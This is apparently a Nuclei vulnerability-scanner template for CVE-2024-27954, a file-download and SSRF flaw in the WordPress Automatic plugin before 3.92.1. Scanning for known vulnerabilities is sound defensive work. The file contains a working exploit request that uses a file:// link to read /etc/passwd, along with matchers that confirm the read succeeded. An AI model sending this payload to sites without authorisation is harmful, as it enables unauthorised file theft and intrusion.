nuclei-templates/http/cves/2024/CVE-2024-27954.yaml

37 lines
1.3 KiB
YAML
Raw Normal View History

2024-03-22 15:33:04 +00:00
id: CVE-2024-27954
info:
2024-03-22 15:43:51 +00:00
name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF
2024-03-22 15:33:04 +00:00
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
2024-03-22 15:43:51 +00:00
WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.
2024-03-22 15:33:04 +00:00
reference:
- https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
2024-03-22 15:43:51 +00:00
classification:
cve-id: CVE-2024-27954
metadata:
max-request: 1
verified: true
2024-03-22 15:50:43 +00:00
publicwww-query: "/wp-content/plugins/wp-automatic/"
tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic
2024-03-22 15:33:04 +00:00
http:
- raw:
- |
GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"link":"file:'
- type: word
part: body
words:
- 'root:x:0:0:root:'